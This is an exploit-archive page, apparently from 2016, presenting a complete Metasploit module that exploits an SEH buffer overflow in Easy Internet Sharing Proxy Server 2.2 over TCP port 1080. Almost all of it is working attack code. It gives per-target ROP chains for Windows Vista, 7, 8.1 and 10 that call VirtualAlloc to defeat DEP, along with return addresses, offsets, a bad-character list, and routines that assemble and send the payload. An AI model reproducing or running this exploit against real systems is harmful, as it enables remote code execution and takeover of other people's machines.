Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)



EKU-ID: 6046 CVE: OSVDB-ID:
Author: Tracy Turben Published: 2016-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Seh
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow',
      'Description'    => %q{
        This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2
      },
      'Platform'       => 'win',
      'Author'         =>
        [
          'tracyturben[at]gmail.com'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ %w{URL http://www.sharing-file.com/products.htm}]
        ],
      'Privileged'     => false,
 
      'Payload'        =>
        {
          'Space'           => 836,
          'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',
          'StackAdjustment' => -3500,
        },
      'Targets'=>
        [
          [ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ],
          [ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ],
          [ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ],
          [ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ]
        ],
      'DefaultOptions'=>{
      'RPORT'=> 1080,
      'EXITFUNC'=> 'thread'
        },
      'DisclosureDate' => 'Nov 10 2016',
      'DefaultTarget'=> 0))
end
 
  def exploit
    connect
    rop_gadgets =''
 
    if target.name =~ /Vista 32bit/
 
     print_good("Building Windows Vista Rop Chain")
     rop_gadgets =
     [
      0x0043fb03,
      0x0043fb03,
      0x0043fb03,
      0x0043fb03,
      0x0043fb03,
      0x00454559,  # POP EAX # RETN [easyproxy.exe]
      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
      0x00462589,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
      0x004543b2,  # POP EBP # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
      0x0046764d,  # POP EBX # RETN [easyproxy.exe]
      0x00000001,  # 0x00000001-> ebx
      0x004532e5,  # POP EBX # RETN [easyproxy.exe]
      0x00001000,  # 0x00001000-> edx
      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
      0x00000001,  # size
      0x00486fac,  # POP ECX # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x0044fc45,  # POP EDI # RETN [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0045460d,  # POP EAX # RETN [easyproxy.exe]
      0x90909090,  # nop
      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
   ].flatten.pack('V*')
 
   print_good('Building Exploit...')
   sploit = "\x90" *46
   sploit << rop_gadgets
   sploit << payload.encoded
   sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
   sploit << generate_seh_record(target.ret)
   print_good('Sending exploit...')
   sock.put(sploit)
 
   print_good('Exploit Sent...')
 
   handler
 
   disconnect
end
 
   if target.name =~ /7 32bit/
 
 
    print_good('Building Windows 7 Rop Chain')
 
    rop_gadgets =
    [
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
      0x00000001,  # 0x00000001-> ebx
      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
      0x00001000,  # 0x00001000-> edx
      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
      0x00000001,  # size
      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
      0x90909090,  # nop
      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
    ].flatten.pack('V*')
 
    print_good('Building Exploit...')
    sploit = "\x90" *26
    sploit << rop_gadgets
    sploit << payload.encoded
    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
    sploit << generate_seh_record(target.ret)
    print_good('Sending exploit...')
    sock.put(sploit)
 
    print_good('Exploit Sent...')
    sleep(5)
    handler
 
    disconnect
 
end
 
   if target.name =~ /8.1 32bit/
 
    print_good('Building Windows 8 Rop Chain')
 
    rop_gadgets =
    [
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0047da72,  # POP EAX # RETN [easyproxy.exe]
      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
      0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
      0x00450e40,  # POP EBP # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]
      0x0046934a,  # POP EBX # RETN [easyproxy.exe]
      0x00000001,  # 0x00000001-> ebx
      0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]
      0x00001000,  # 0x00001000-> edx
      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
      0x00000001,  # size
      0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x00453ce6,  # POP EDI # RETN [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x00478ecd,  # POP EAX # RETN [easyproxy.exe]
      0x90909090,  # nop
      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
 
    ].flatten.pack('V*')
 
    print_good('Building Exploit...')
    sploit = "\x90" *2
    sploit << rop_gadgets
    sploit << payload.encoded
    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
    sploit << generate_seh_record(target.ret)
    print_good('Sending exploit...')
    sock.put(sploit)
    print_good('Exploit Sent...')
    handler
 
    disconnect
 
 
end
 
    if target.name =~ /10 32bit/
 
 
 
    print_good('Building Windows 10 Rop Chain')
 
    rop_gadgets =
    [
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x0047f1de,  # POP EBX # RETN [easyproxy.exe]
      0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]
      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
      0x41414141,  # Filler (compensate)
      0x00438d30,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
      0x004676b0,  # POP EBP # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]
      0x0046bf38,  # POP EBX # RETN [easyproxy.exe]
      0x00000001,  # 0x00000001-> ebx
      0x00481477,  # POP EBX # RETN [easyproxy.exe]
      0x00001000,  # 0x00001000-> edx
      0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]
      0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
      0x00000001,  # Filler (compensate)
      0x00488098,  # POP ECX # RETN [easyproxy.exe]
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x0044ca38,  # POP EDI # RETN [easyproxy.exe]
      0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]
      0x00454559,  # POP EAX # RETN [easyproxy.exe]
      0x90909090,  # nop
      0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
    ].flatten.pack('V*')
 
    print_good('Building Exploit...')
    sploit = "\x90" *2
    sploit << rop_gadgets
    sploit << payload.encoded
    sploit << make_nops(target['Nops'])
    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
    sploit << generate_seh_record(target.ret)
    print_good('Sending exploit...')
    sock.put(sploit)
 
    print_good('Exploit Sent...')
 
    handler
 
 
    disconnect
 
  end
 end
end